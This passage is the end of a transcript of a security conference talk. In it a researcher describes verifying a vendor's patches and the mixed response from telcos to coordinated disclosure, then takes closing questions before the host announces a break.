I didn't mention this, but after the company that develops everything patched it all, we actually tested to make sure that they did everything properly. We did code reviews and whatnot. So it's not just about the exploitation. It's also about getting it fixed, and they were pretty collaborative, to be honest. The telcos, it's mixed. Some of them were really open and really receptive to that kind of disclosure. Others were not as much and had to be convinced. In this case, I would say I'm lucky that I'm part of a big company, so someone important from my company can talk to someone important at that telco. But if you're an individual researcher, I don't know. I think it would have been much more difficult. I would probably say that. Large men in fancy suits would come to your house. Yeah, yeah. Hopefully not. Hopefully not. Yeah. I have a guard cat in my home, so... Awesome. Yes, perfect. Make sure you protect both the front and back door. Yeah, yeah. Well, I need another cat. More questions? Awesome. Well, if there are any follow-up questions or you want more technical data or whatnot, just reach out to me. I also do macOS, Linux, Chrome OS, iOS, those sorts of things. And I'm interested in everything that runs code. So thank you so much. And I'll see you guys around. Thank you, Jonathan. Give our speaker a warm round of applause. We've got roughly 10 minutes until our next speaker. So it's a good time to take a bio break, schmooze with the people that are here and network, and look around for Easter eggs. And we'll see you back in about 10 minutes.